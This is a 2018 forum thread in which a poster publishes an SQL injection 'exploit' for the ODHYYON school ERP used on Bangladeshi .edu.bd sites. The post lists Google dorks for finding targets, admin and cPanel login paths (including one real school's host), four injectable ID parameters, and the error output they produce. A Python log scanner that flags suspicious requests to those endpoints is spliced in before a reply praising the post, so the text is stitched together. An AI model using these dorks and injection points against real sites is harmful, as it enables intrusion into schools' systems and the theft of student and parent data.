Topic: Odhyyon Addie Soft LTD BD Edu SQL Inj Exploit
KingSkrupellos
Post: #1
Odhyyon Addie Soft LTD BD Edu SQL Inj Exploit
04.11.2018 15:53
#################################################################################################

# Exploit Title : Powered by ODHYYON A product of ADDIE Soft Ltd Bangladesh Education SQL Injection Vulnerability
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 05/11/2018
# Vendor Homepage : odhyyon.com ~ addiesoft.com
# Tested On : Windows and Linux
# Category : WebApps
# Version Information : v1.16.05.11 - Microsoft .NET Framework Version:4.0.30319; ASP.NET Version:4.7.2623.0
# Google Dorks :
intext:''Powered by ODHYYON, A product of ADDIE Soft Ltd.''
intext:''Copyright ©2016,ODDHOYON Education ERP, A Product Of ADDIE Soft Ltd.''
inurl:''/PublicSite/Bangla/'' site:edu.bd
# Exploit Risk : Medium
# CWE : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ]

#################################################################################################

# Admin Panel Login Path :

oems.DOMAINADRESSHERE.edu.bd

admin.DOMAINADRESSHERE.edu.bd/LogIn.aspx

mail.DOMAINADRESSHERE.edu.bd:2096

# Student/Parents Portal Login Path :

admin.DOMAINADRESSHERE.edu.bd/SPLoginWebPage.aspx

# CPanel Admin Login Path :

mail.DOMAINADRESSHERE.edu.bd:2096/openid_connect/cpanelid?goto_app=
&goto_uri=%2f&parameterized_form=&theme=&user=

mail.kgsck.edu.bd:2096/openid_connect/cpanelid?goto_app=&goto_uri=
%2f&parameterized_form=&theme=&user=


#################################################################################################

# SQL Injection Exploit :

/PublicSite/Bangla/Notice_SingleWebForm.aspx?NoticeId=[SQL Injection]

/PublicSite/Bangla/News_DescriptionWebForm.aspx?NewsId=[SQL Injection]

/PublicSite/Bangla/MessageFromPrincipleWebForm.aspx?TopMenu=[SQL Injection]

/RedirectPage.aspx?Url_ID=[SQL Injection]

#################################################################################################

# Example Vulnerable Site =>


#################################################################################################

# SQL Database Error :

SQL Server Setup Failure : Input string was not in a correct format

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''4''' at line 1

Server Error in '/' Application.
Object reference not set to an instance of an object.
Description: An unhandled exception occurred during the execution of the current web request.
Please review the stack trace for more information about the error and where it originated in the code.

Exception Details: System.NullReferenceException: Object reference not set to an instance of an object.

Source Error:

An unhandled exception was generated during the execution of the current web request.
Information regarding the origin and location of the exception can be identified using the exception stack trace below.

Stack Trace:

[NullReferenceException: Object reference not set to an instance of an object.]
EMS_Oddhoyon_Web.PublicSite.Bangla.MessageFromPrincipleWebForm.BindMessage() in F:\Work\APSCLHS Website\OEMS_V2_Web\EMS_Oddhoyon_Web\PublicSite\Bangla\MessageFromPrincipleWebForm.aspx.cs:51
EMS_Oddhoyon_Web.PublicSite.Bangla.MessageFromPrincipleWebForm.Page_Load(Object sender, EventArgs e) in F:\Work\APSCLHS Website\OEMS_V2_Web\EMS_Oddhoyon_Web\PublicSite\Bangla\MessageFromPrincipleWebForm.aspx.cs:45
System.Web.UI.Control.OnLoad(EventArgs e) +102
System.Web.UI.Control.LoadRecursive() +67
System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint) +1384

Version Information: Microsoft .NET Framework Version:4.0.30319; ASP.NET Version:4.7.2623.0

#################################################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

#################################################################################################

We don't care what people think about us, we are proud of ourselves, we are not going to change for anyone. I do not have my own website. No contact. # KingSkrupellos # Cyberizm Digital Security Technological Turkish Moslem Army.
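
A defensive check for the four endpoints listed in the post, as an added example that is not part of the original post: it scans web-server logs for requests whose ID parameter is missing, repeated, or not a plain integer. The log lines and their field order are constructed for illustration, and treating the IDs as integers is an assumption based on the numeric values shown in the post.

```python
import re
from urllib.parse import parse_qsl

# Endpoint -> ID parameter, as listed in the post (lower-cased for matching).
WATCHED = {
    "/publicsite/bangla/notice_singlewebform.aspx": "noticeid",
    "/publicsite/bangla/news_descriptionwebform.aspx": "newsid",
    "/publicsite/bangla/messagefromprinciplewebform.aspx": "topmenu",
    "/redirectpage.aspx": "url_id",
}
NUMERIC = re.compile(r"[0-9]{1,10}")  # assumption: IDs are small integers

# Constructed sample in IIS W3C style; the field order is an assumption.
FIELDS = "date time cs-method cs-uri-stem cs-uri-query c-ip sc-status".split()
SAMPLE_LOG = """\
#Fields: date time cs-method cs-uri-stem cs-uri-query c-ip sc-status
2018-11-05 10:00:01 GET /PublicSite/Bangla/Notice_SingleWebForm.aspx NoticeId=12 192.0.2.10 200
2018-11-05 10:00:07 GET /PublicSite/Bangla/Notice_SingleWebForm.aspx NoticeId=12%27 198.51.100.7 500
2018-11-05 10:00:09 GET /PublicSite/Bangla/News_DescriptionWebForm.aspx NewsId=3 192.0.2.10 200
2018-11-05 10:00:15 GET /RedirectPage.aspx Url_ID=5%20abc 198.51.100.7 500
2018-11-05 10:00:20 GET /PublicSite/Bangla/MessageFromPrincipleWebForm.aspx - 192.0.2.44 500
2018-11-05 10:00:31 GET /Default.aspx q=it%27s 192.0.2.10 200
"""

def suspicious_requests(log_text):
    """Return (ip, path, param, decoded value, status) for each watched
    request whose ID parameter is missing or not a plain integer."""
    hits = []
    for line in log_text.splitlines():
        if not line or line.startswith("#"):
            continue
        parts = line.split(" ")
        if len(parts) != len(FIELDS):
            continue  # malformed line: skip rather than guess
        rec = dict(zip(FIELDS, parts))
        param = WATCHED.get(rec["cs-uri-stem"].lower())
        if param is None:
            continue
        query = "" if rec["cs-uri-query"] == "-" else rec["cs-uri-query"]
        values = [v for k, v in parse_qsl(query, keep_blank_values=True)
                  if k.lower() == param]
        # Missing, repeated, or non-numeric values are all flagged.
        if len(values) != 1 or not NUMERIC.fullmatch(values[0]):
            value = values[0] if values else None
            hits.append((rec["c-ip"], rec["cs-uri-stem"], param, value,
                         int(rec["sc-status"])))
    return hits
```

Flagged requests that also returned HTTP 500 correspond to the unhandled-exception pages quoted in the post and are the ones to review first.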



Dessy
Post: #2
Re: Odhyyon Addie Soft LTD BD Edu SQL Inj Exploit
08.11.2018 08:26
Well done, thanks for your effort, chief.
